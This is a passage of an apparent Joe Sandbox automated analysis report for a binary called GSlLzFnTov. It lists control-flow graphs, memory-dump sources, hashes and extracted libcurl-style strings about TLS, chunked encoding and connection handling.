                            • Instruction Fuzzy Hash: 5461AE32B0562286F708AF61D8500ACB3B1FB04B58F814535DE2E57B98CFBCD896C790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 992 7ff7f1db1d84-7ff7f1db1db4 GetModuleHandleA 993 7ff7f1db1ee6-7ff7f1db1efe 992->993 994 7ff7f1db1dba-7ff7f1db1de0 GetProcAddress _mbspbrk 992->994 995 7ff7f1db1de2-7ff7f1db1de8 994->995 996 7ff7f1db1dfa-7ff7f1db1dfd 994->996 997 7ff7f1db1df2-7ff7f1db1df8 LoadLibraryA 995->997 998 7ff7f1db1dea-7ff7f1db1df0 995->998 999 7ff7f1db1dff-7ff7f1db1e12 GetProcAddress 996->999 1000 7ff7f1db1e30-7ff7f1db1e3f GetSystemDirectoryA 996->1000 1002 7ff7f1db1e28-7ff7f1db1e2b 997->1002 1001 7ff7f1db1e1d-7ff7f1db1e22 LoadLibraryExA 998->1001 999->1000 1003 7ff7f1db1e14-7ff7f1db1e1a 999->1003 1004 7ff7f1db1e45-7ff7f1db1e49 1000->1004 1005 7ff7f1db1ee3 1000->1005 1001->1002 1002->1005 1003->1001 1006 7ff7f1db1e4c-7ff7f1db1e52 1004->1006 1005->993 1006->1006 1007 7ff7f1db1e54-7ff7f1db1e6d 1006->1007 1009 7ff7f1db1e6f-7ff7f1db1e7d GetSystemDirectoryA 1007->1009 1010 7ff7f1db1ed3-7ff7f1db1eda 1007->1010 1009->1010 1011 7ff7f1db1e7f 1009->1011 1010->1005 1012 7ff7f1db1e82-7ff7f1db1e88 1011->1012 1012->1012 1013 7ff7f1db1e8a-7ff7f1db1e8f 1012->1013 1014 7ff7f1db1e93-7ff7f1db1e9a 1013->1014 1014->1014 1015 7ff7f1db1e9c-7ff7f1db1ea2 1014->1015 1016 7ff7f1db1ea5-7ff7f1db1eaf 1015->1016 1016->1016 1017 7ff7f1db1eb1-7ff7f1db1eb7 1016->1017 1018 7ff7f1db1eb9-7ff7f1db1ec8 1017->1018 1019 7ff7f1db1eca LoadLibraryA 1017->1019 1020 7ff7f1db1ed0 1018->1020 1019->1020 1020->1010
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: LibraryLoad$AddressDirectoryProcSystem$HandleModule_mbspbrk
                            • String ID: AddDllDirectory$LoadLibraryExA$kernel32
                            • API String ID: 1885204609-3327535076
                            • Opcode ID: 4434697843a5cd4062081c14776d37e9057b5a8912e9a210e3dd3141d5cb97da
                            • Instruction ID: 329dcd4fd337345c8165ad87c3a0251e130be4e4f8404e4850544bf63687030c
                            • Opcode Fuzzy Hash: 4434697843a5cd4062081c14776d37e9057b5a8912e9a210e3dd3141d5cb97da
                            • Instruction Fuzzy Hash: 2C418D11A0874295FB18FB1AB850139A3A5AF48F96F888530CD6F077D4EFBCE44693A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1022 7ff7f1dde930-7ff7f1dde9b5 1023 7ff7f1dde9d1-7ff7f1dde9d6 1022->1023 1024 7ff7f1dde9b7-7ff7f1dde9bb 1022->1024 1026 7ff7f1dde9e6-7ff7f1dde9ea 1023->1026 1027 7ff7f1dde9d8-7ff7f1dde9e1 1023->1027 1024->1023 1025 7ff7f1dde9bd-7ff7f1dde9cc call 7ff7f1db1f00 1024->1025 1036 7ff7f1dded32-7ff7f1dded36 1025->1036 1030 7ff7f1dde9ec-7ff7f1dde9f3 1026->1030 1031 7ff7f1dde9f8-7ff7f1dde9fb 1026->1031 1029 7ff7f1dded21 1027->1029 1033 7ff7f1dded24 call 7ff7f1db1f00 1029->1033 1030->1029 1034 7ff7f1ddeaf4 1031->1034 1035 7ff7f1ddea01-7ff7f1ddea05 1031->1035 1040 7ff7f1dded29-7ff7f1dded2c 1033->1040 1038 7ff7f1ddeaf9-7ff7f1ddeafd 1034->1038 1035->1034 1039 7ff7f1ddea0b-7ff7f1ddea1d 1035->1039 1042 7ff7f1ddee22-7ff7f1ddee26 1036->1042 1043 7ff7f1dded3c-7ff7f1dded40 1036->1043 1038->1040 1041 7ff7f1ddeb03-7ff7f1ddeb06 1038->1041 1044 7ff7f1ddea1f-7ff7f1ddea23 1039->1044 1045 7ff7f1ddea2b-7ff7f1ddea4e 1039->1045 1040->1036 1040->1042 1041->1040 1046 7ff7f1ddeb0c-7ff7f1ddeb0f 1041->1046 1049 7ff7f1ddee30-7ff7f1ddee3e 1042->1049 1050 7ff7f1ddee28-7ff7f1ddee2b 1042->1050 1043->1042 1047 7ff7f1dded46-7ff7f1dded4a 1043->1047 1044->1045 1048 7ff7f1ddea25-7ff7f1ddea29 1044->1048 1058 7ff7f1ddea57-7ff7f1ddea5a 1045->1058 1054 7ff7f1ddeb21-7ff7f1ddeb93 1046->1054 1055 7ff7f1ddeb11-7ff7f1ddeb15 1046->1055 1047->1042 1056 7ff7f1dded50-7ff7f1dded64 call 7ff7f1da3968 1047->1056 1057 7ff7f1ddea88-7ff7f1ddeaa0 call 7ff7f1db2738 1048->1057 1052 7ff7f1ddee40-7ff7f1ddee6f call 7ff7f1deca50 * 2 1049->1052 1053 7ff7f1ddee71-7ff7f1ddee75 1049->1053 1050->1049 1051 7ff7f1ddee2d 1050->1051 1051->1049 1083 7ff7f1ddee9b-7ff7f1ddeebd call 7ff7f1deaf80 1052->1083 1062 7ff7f1ddee8b-7ff7f1ddee8e 1053->1062 1063 7ff7f1ddee77-7ff7f1ddee7e 1053->1063 1079 7ff7f1ddeb95-7ff7f1ddeb9a 1054->1079 1080 7ff7f1ddeba7-7ff7f1ddebab 1054->1080 1055->1054 1061 7ff7f1ddeb17-7ff7f1ddeb1b 1055->1061 1081 7ff7f1ddee0d-7ff7f1ddee1d call 7ff7f1db1f00 1056->1081 1082 7ff7f1dded6a-7ff7f1dded6d 1056->1082 1069 7ff7f1ddeaa5-7ff7f1ddeaac 1057->1069 1065 7ff7f1ddea5c-7ff7f1ddea74 call 7ff7f1db1fa0 1058->1065 1066 7ff7f1ddea79-7ff7f1ddea84 1058->1066 1061->1040 1061->1054 1073 7ff7f1ddee96-7ff7f1ddee98 1062->1073 1074 7ff7f1ddee90-7ff7f1ddee93 1062->1074 1063->1062 1070 7ff7f1ddee80-7ff7f1ddee86 1063->1070 1065->1036 1066->1057 1077 7ff7f1ddeaae-7ff7f1ddeab1 1069->1077 1078 7ff7f1ddeada-7ff7f1ddeae2 1069->1078 1070->1062 1073->1083 1074->1073 1077->1034 1085 7ff7f1ddeab3-7ff7f1ddeab9 1077->1085 1092 7ff7f1ddeae4-7ff7f1ddeae8 1078->1092 1093 7ff7f1ddeaea 1078->1093 1079->1080 1086 7ff7f1ddeb9c-7ff7f1ddeba1 1079->1086 1089 7ff7f1ddebad-7ff7f1ddebcb 1080->1089 1090 7ff7f1ddec28-7ff7f1ddec2c 1080->1090 1081->1042 1082->1081 1087 7ff7f1dded73-7ff7f1dded77 1082->1087 1095 7ff7f1ddeabb-7ff7f1ddeac7 call 7ff7f1db1f00 1085->1095 1096 7ff7f1ddeac9-7ff7f1ddead8 call 7ff7f1db1f00 1085->1096 1086->1080 1099 7ff7f1dded7c-7ff7f1dded83 1086->1099 1087->1042 1100 7ff7f1ddebd3-7ff7f1ddebf5 1089->1100 1101 7ff7f1ddebcd-7ff7f1ddebd1 1089->1101 1097 7ff7f1ddec2e-7ff7f1ddec33 1090->1097 1098 7ff7f1ddec5a 1090->1098 1092->1034 1093->1034 1094 7ff7f1ddeaec-7ff7f1ddeaf0 1093->1094 1094->1034 1095->1034 1096->1034 1097->1098 1106 7ff7f1ddec35-7ff7f1ddec3c 1097->1106 1103 7ff7f1ddec5e-7ff7f1ddec65 1098->1103 1108 7ff7f1dded85-7ff7f1dded8c 1099->1108 1109 7ff7f1dded9d-7ff7f1ddedc1 call 7ff7f1daeb80 call 7ff7f1db1f00 1099->1109 1122 7ff7f1ddedc6-7ff7f1ddedde call 7ff7f1db1fa0 1100->1122 1123 7ff7f1ddebfb-7ff7f1ddec03 1100->1123 1101->1100 1104 7ff7f1ddec06-7ff7f1ddec0b 1101->1104 1110 7ff7f1ddecff-7ff7f1dded06 1103->1110 1111 7ff7f1ddec6b-7ff7f1ddec7d call 7ff7f1db1f00 1103->1111 1114 7ff7f1ddec25 1104->1114 1115 7ff7f1ddec0d-7ff7f1ddec21 call 7ff7f1deca50 1104->1115 1106->1103 1117 7ff7f1ddec3e-7ff7f1ddec58 call 7ff7f1deca50 1106->1117 1119 7ff7f1dded94-7ff7f1dded9b 1108->1119 1120 7ff7f1dded8e 1108->1120 1109->1040 1110->1038 1127 7ff7f1dded0c-7ff7f1dded14 1110->1127 1134 7ff7f1ddec7f-7ff7f1ddec82 1111->1134 1135 7ff7f1ddec88-7ff7f1ddec8f 1111->1135 1114->1090 1115->1114 1117->1103 1119->1029 1120->1119 1122->1040 1123->1104 1127->1040 1128 7ff7f1dded16-7ff7f1dded1a 1127->1128 1128->1029 1134->1135 1138 7ff7f1ddede3-7ff7f1ddedea 1134->1138 1139 7ff7f1ddec95-7ff7f1ddece5 call 7ff7f1db1f00 call 7ff7f1dde490 1135->1139 1140 7ff7f1ddedfb-7ff7f1ddee08 1135->1140 1138->1029 1145 7ff7f1ddedef-7ff7f1ddedf6 1139->1145 1146 7ff7f1ddeceb-7ff7f1ddecfa call 7ff7f1db1f00 1139->1146 1140->1033 1145->1033 1146->1038
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID:
                            • String ID: schannel: Curl_read_plain returned CURLE_RECV_ERROR$schannel: Curl_read_plain returned error %d$schannel: SSL/TLS connection renegotiated$schannel: an unrecoverable error occurred in a prior call$schannel: can't renegotiate, an error is pending$schannel: can't renegotiate, encrypted data available$schannel: enough decrypted data is already available$schannel: failed to decrypt data, need more data$schannel: failed to read data from server: %s$schannel: remote party requests renegotiation$schannel: renegotiating SSL/TLS connection$schannel: renegotiation failed$schannel: server closed abruptly (missing close_notify)$schannel: server closed the connection$schannel: server indicated shutdown in a prior call$schannel: unable to re-allocate memory
                            • API String ID: 0-3083360527
                            • Opcode ID: c3f72a038d7ce50e2676dc4b36a6e8893acae260767b1923e5aea78f1d9cbbc4
                            • Instruction ID: dbb49ebfc4f6f4ec209c66a378a7f9a7ed8cedebe4f7158847078703351f9199
                            • Opcode Fuzzy Hash: c3f72a038d7ce50e2676dc4b36a6e8893acae260767b1923e5aea78f1d9cbbc4
                            • Instruction Fuzzy Hash: C0F1AF72A0874285EB60EF29D480379B7B5FB04B88F905435DA6E066D8DFBCE481D7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: strncmp
                            • String ID: $%ld$(nil)$(nil)$.%ld$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                            • API String ID: 1114863663-3012073033
                            • Opcode ID: 4182dc489f97b54357e9e53eb259c5ad35331cb2cf4078041a25781322b9f17f
                            • Instruction ID: 6412f46c09d43e8f21d4480365b977ce833f68966f1e514591c7f33a45befe93
                            • Opcode Fuzzy Hash: 4182dc489f97b54357e9e53eb259c5ad35331cb2cf4078041a25781322b9f17f
                            • Instruction Fuzzy Hash: 53522923A0C58245E765EB25A44437AE7B1BF64798F884230DE7E07BDADFBCE5448390
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1579 7ff7f1dbadc8-7ff7f1dbae0e 1580 7ff7f1dbae10-7ff7f1dbae1d 1579->1580 1581 7ff7f1dbae1f-7ff7f1dbae22 1579->1581 1582 7ff7f1dbae24-7ff7f1dbae34 1580->1582 1581->1582 1583 7ff7f1dbae40-7ff7f1dbae4e call 7ff7f1db839c 1582->1583 1584 7ff7f1dbae36-7ff7f1dbae3b 1582->1584 1590 7ff7f1dbae50-7ff7f1dbae55 1583->1590 1591 7ff7f1dbae5a-7ff7f1dbae6c call 7ff7f1db88d8 1583->1591 1585 7ff7f1dbb5ca-7ff7f1dbb5ef call 7ff7f1deaf80 1584->1585 1590->1585 1591->1585 1594 7ff7f1dbae72-7ff7f1dbae7c 1591->1594 1595 7ff7f1dbae97-7ff7f1dbaea1 1594->1595 1596 7ff7f1dbae7e-7ff7f1dbae95 1594->1596 1597 7ff7f1dbaea3-7ff7f1dbaeba 1595->1597 1598 7ff7f1dbaebc-7ff7f1dbaec6 1595->1598 1596->1590 1596->1595 1597->1590 1597->1598 1600 7ff7f1dbaef1-7ff7f1dbaf02 call 7ff7f1db97c0 1598->1600 1601 7ff7f1dbaec8-7ff7f1dbaedf 1598->1601 1600->1585 1607 7ff7f1dbaf08-7ff7f1dbaf16 1600->1607 1601->1590 1606 7ff7f1dbaee5-7ff7f1dbaeeb 1601->1606 1606->1600 1608 7ff7f1dbaf18-7ff7f1dbaf1e 1607->1608 1609 7ff7f1dbaf27-7ff7f1dbaf2d 1607->1609 1608->1609 1612 7ff7f1dbaf20 1608->1612 1610 7ff7f1dbaf2f-7ff7f1dbaf35 1609->1610 1611 7ff7f1dbaf7a-7ff7f1dbaf89 call 7ff7f1db9dbc 1609->1611 1610->1611 1613 7ff7f1dbaf37-7ff7f1dbaf74 call 7ff7f1da4fc8 call 7ff7f1daa254 1610->1613 1611->1585 1618 7ff7f1dbaf8f-7ff7f1dbaf9e call 7ff7f1dba220 1611->1618 1612->1609 1613->1590 1613->1611 1618->1585 1623 7ff7f1dbafa4-7ff7f1dbafba call 7ff7f1dba4c8 1618->1623 1623->1585 1626 7ff7f1dbafc0-7ff7f1dbafd3 call 7ff7f1db8364 1623->1626 1626->1585 1629 7ff7f1dbafd9-7ff7f1dbafdf 1626->1629 1630 7ff7f1dbafe1-7ff7f1dbaff4 call 7ff7f1db8364 1629->1630 1631 7ff7f1dbaffa-7ff7f1dbb001 1629->1631 1630->1585 1630->1631 1633 7ff7f1dbb003-7ff7f1dbb016 call 7ff7f1db8364 1631->1633 1634 7ff7f1dbb01c-7ff7f1dbb023 1631->1634 1633->1585 1633->1634 1637 7ff7f1dbb025-7ff7f1dbb038 call 7ff7f1db8364 1634->1637 1638 7ff7f1dbb03e-7ff7f1dbb048 1634->1638 1637->1585 1637->1638 1639 7ff7f1dbb04a-7ff7f1dbb05f call 7ff7f1da55c4 1638->1639 1640 7ff7f1dbb06b-7ff7f1dbb073 1638->1640 1639->1640 1651 7ff7f1dbb061-7ff7f1dbb068 1639->1651 1644 7ff7f1dbb075-7ff7f1dbb081 1640->1644 1645 7ff7f1dbb08c-7ff7f1dbb08f 1640->1645 1644->1645 1648 7ff7f1dbb083-7ff7f1dbb08a 1644->1648 1649 7ff7f1dbb091-7ff7f1dbb095 1645->1649 1650 7ff7f1dbb099 1645->1650 1648->1645 1652 7ff7f1dbb097 1649->1652 1653 7ff7f1dbb0ab-7ff7f1dbb0b9 1649->1653 1654 7ff7f1dbb09b-7ff7f1dbb0a2 1650->1654 1651->1640 1652->1654 1656 7ff7f1dbb0da-7ff7f1dbb0e0 1653->1656 1657 7ff7f1dbb0bb-7ff7f1dbb0cb 1653->1657 1654->1653 1655 7ff7f1dbb0a4 1654->1655 1655->1653 1658 7ff7f1dbb0e2-7ff7f1dbb0e8 1656->1658 1659 7ff7f1dbb0ee-7ff7f1dbb0f5 1656->1659 1657->1585 1662 7ff7f1dbb0d1-7ff7f1dbb0d8 1657->1662 1658->1659 1661 7ff7f1dbb0fa-7ff7f1dbb117 1659->1661 1661->1661 1663 7ff7f1dbb119-7ff7f1dbb133 1661->1663 1662->1656 1664 7ff7f1dbb1df-7ff7f1dbb3ec call 7ff7f1dbc958 1663->1664 1665 7ff7f1dbb139-7ff7f1dbb16a call 7ff7f1db307c 1663->1665 1664->1590 1670 7ff7f1dbb3f2-7ff7f1dbb407 call 7ff7f1dbc958 1664->1670 1674 7ff7f1dbb1cf-7ff7f1dbb1da call 7ff7f1dbb90c 1665->1674 1675 7ff7f1dbb16c-7ff7f1dbb18a call 7ff7f1dab52c call 7ff7f1dbf4d0 1665->1675 1670->1590 1676 7ff7f1dbb40d-7ff7f1dbb41c call 7ff7f1db7768 1670->1676 1674->1585 1675->1585 1687 7ff7f1dbb190-7ff7f1dbb19f call 7ff7f1db8eb4 1675->1687 1685 7ff7f1dbb41e-7ff7f1dbb425 1676->1685 1686 7ff7f1dbb42b-7ff7f1dbb432 1676->1686 1685->1686 1688 7ff7f1dbb4f7-7ff7f1dbb508 1685->1688 1686->1688 1689 7ff7f1dbb438-7ff7f1dbb456 call 7ff7f1db7888 1686->1689 1701 7ff7f1dbb1a1-7ff7f1dbb1b7 1687->1701 1702 7ff7f1dbb1bc-7ff7f1dbb1ca call 7ff7f1dc3300 1687->1702 1692 7ff7f1dbb52a-7ff7f1dbb52e 1688->1692 1693 7ff7f1dbb50a-7ff7f1dbb511 1688->1693 1689->1688 1703 7ff7f1dbb45c-7ff7f1dbb49d call 7ff7f1dba9cc 1689->1703 1698 7ff7f1dbb530-7ff7f1dbb545 call 7ff7f1dbf448 1692->1698 1699 7ff7f1dbb5ab-7ff7f1dbb5c5 call 7ff7f1db1f00 call 7ff7f1db7144 1692->1699 1696 7ff7f1dbb513 1693->1696 1697 7ff7f1dbb51a-7ff7f1dbb521 1693->1697 1696->1697 1697->1692 1704 7ff7f1dbb523 1697->1704 1710 7ff7f1dbb5f0-7ff7f1dbb5f7 1698->1710 1711 7ff7f1dbb54b-7ff7f1dbb54e 1698->1711 1699->1585 1701->1585 1702->1674 1731 7ff7f1dbb49f-7ff7f1dbb4a6 1703->1731 1732 7ff7f1dbb4a8-7ff7f1dbb4af 1703->1732 1704->1692 1717 7ff7f1dbb606-7ff7f1dbb609 1710->1717 1718 7ff7f1dbb5f9-7ff7f1dbb601 call 7ff7f1dadfe8 1710->1718 1711->1710 1715 7ff7f1dbb554-7ff7f1dbb558 1711->1715 1715->1710 1719 7ff7f1dbb55e-7ff7f1dbb574 call 7ff7f1dbf920 1715->1719 1721 7ff7f1dbb637-7ff7f1dbb651 call 7ff7f1dab52c call 7ff7f1dbf4d0 1717->1721 1722 7ff7f1dbb60b-7ff7f1dbb616 call 7ff7f1dbf3f0 1717->1722 1718->1717 1733 7ff7f1dbb576-7ff7f1dbb57e call 7ff7f1dadfe8 1719->1733 1734 7ff7f1dbb583-7ff7f1dbb589 1719->1734 1721->1585 1747 7ff7f1dbb657-7ff7f1dbb65e 1721->1747 1722->1721 1736 7ff7f1dbb618-7ff7f1dbb626 call 7ff7f1dbf9d0 1722->1736 1737 7ff7f1dbb4c1-7ff7f1dbb4f2 call 7ff7f1db1f00 1731->1737 1738 7ff7f1dbb4b1-7ff7f1dbb4b8 1732->1738 1739 7ff7f1dbb4ba 1732->1739 1733->1734 1742 7ff7f1dbb59a-7ff7f1dbb5a9 call 7ff7f1db1f00 1734->1742 1743 7ff7f1dbb58b-7ff7f1dbb598 call 7ff7f1db73b8 1734->1743 1750 7ff7f1dbb703-7ff7f1dbb70f call 7ff7f1db1f00 1736->1750 1751 7ff7f1dbb62c-7ff7f1dbb632 call 7ff7f1db73b8 1736->1751 1758 7ff7f1dbb6b5-7ff7f1dbb6cc call 7ff7f1dbb90c call 7ff7f1db8eb4 1737->1758 1738->1737 1739->1737 1742->1699 1743->1717 1753 7ff7f1dbb660-7ff7f1dbb667 1747->1753 1754 7ff7f1dbb686-7ff7f1dbb68d 1747->1754 1750->1699 1751->1721 1753->1754 1759 7ff7f1dbb669-7ff7f1dbb67f call 7ff7f1db1f00 1753->1759 1754->1758 1761 7ff7f1dbb68f-7ff7f1dbb696 1754->1761 1758->1585 1772 7ff7f1dbb6d2-7ff7f1dbb6f7 call 7ff7f1dba6fc 1758->1772 1759->1754 1761->1758 1765 7ff7f1dbb698-7ff7f1dbb6ae call 7ff7f1db1f00 1761->1765 1765->1758 1774 7ff7f1dbb6fc-7ff7f1dbb6fe 1772->1774 1774->1585
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l
                            • String ID: NTLM picked AND auth done set, clear picked$NTLM-proxy picked AND auth done set, clear picked$No connections available in cache$No connections available.$No more connections allowed to host: %zu$Re-using existing connection #%ld with %s %s$host$proxy
                            • API String ID: 1488884202-538710404
                            • Opcode ID: e7186baef5072c63650564064f6cba735f1afcf2fc1e0bfec9d04b1f502ece81
                            • Instruction ID: 08972bebb91795423222bfa68a429c6f0ed50df51ff23e097b8da65ea035705c
                            • Opcode Fuzzy Hash: e7186baef5072c63650564064f6cba735f1afcf2fc1e0bfec9d04b1f502ece81
                            • Instruction Fuzzy Hash: FE426322A05B8295EB54EF29D5503B9A7F4FB45B88F884035CE6E4B3D5DFB8E450C3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID:
                            • String ID: %s in chunked-encoding$Bad content-encoding found$Excess found in a read: excess = %zu, size = %I64d, maxdownload = %I64d, bytecount = %I64d$Excess found: excess = %zd url = %s (zero-length body)$Failed reading the chunked-encoded stream$Illegal or missing hexadecimal sequence$Leftovers after chunking: % I64du bytes$Malformed encoding found$Out of memory$Too long hexadecimal number$we are done reading and this is set to close, stop send
                            • API String ID: 0-2983031399
                            • Opcode ID: 755c89fb7edbe622375bee7e6580487aae65205be194f694c5def9aa4dee93a9
                            • Instruction ID: 76ff3f60e2cfbd3a0d0846490657e77546604f436d762cd32026cd3298f4ad0d
                            • Opcode Fuzzy Hash: 755c89fb7edbe622375bee7e6580487aae65205be194f694c5def9aa4dee93a9
                            • Instruction Fuzzy Hash: 0F22A262A0869285FB15EF75C9542B8A7B5FB45B98F840536DE2D037E4CFB8E940C3E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b5420041cbda17de0cb4aef5bd157fa47b292bc835db1d31a614bc884b5c3959
                            • Instruction ID: afcf553df4965fcb445c2f395e4224bdecc4ad6b2088599cea8333f891db6dcf
                            • Opcode Fuzzy Hash: b5420041cbda17de0cb4aef5bd157fa47b292bc835db1d31a614bc884b5c3959
                            • Instruction Fuzzy Hash: 6A91D332A1E68186E768EB25D4506BAB3B0FB44B90F805131DE6E077D5DFBCE846C790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLastrecvsend
                            • String ID: Send failure: %s
                            • API String ID: 3418755260-857917747
                            • Opcode ID: 1cdd2b38b1936f1c5e32caaaeca32c86b6b2e1835748a7090fd4fdf949a96f8d
                            • Instruction ID: b1dcf00d50a75406149e6c743f90a04e5cad5cfa1f6452bfac27b6039a943dc8
                            • Opcode Fuzzy Hash: 1cdd2b38b1936f1c5e32caaaeca32c86b6b2e1835748a7090fd4fdf949a96f8d
                            • Instruction Fuzzy Hash: 3D41C132A04A8251E764EF19E9847B9A3A0BB48BA5F840339DE3D473D4DFBCE051C350
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID:
                            • String ID: Hostname '%s' was found in DNS cache$Transfer was pending, now try another$operation aborted by pre-request callback
                            • API String ID: 0-929452361
                            • Opcode ID: b14d308005be2bdef438f697b1ca9294f313fd3f6abe10cda276aba92b396e27
                            • Instruction ID: 13062e447ce6abddd59c46ba52c8102d757c2e9377b6bc6af35c2cffaed432b6
                            • Opcode Fuzzy Hash: b14d308005be2bdef438f697b1ca9294f313fd3f6abe10cda276aba92b396e27
                            • Instruction Fuzzy Hash: 13A2B022F0968286EB64EB2581403BDA7B1AB45BD8F844235CE2D577D6DFBCE445C3E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
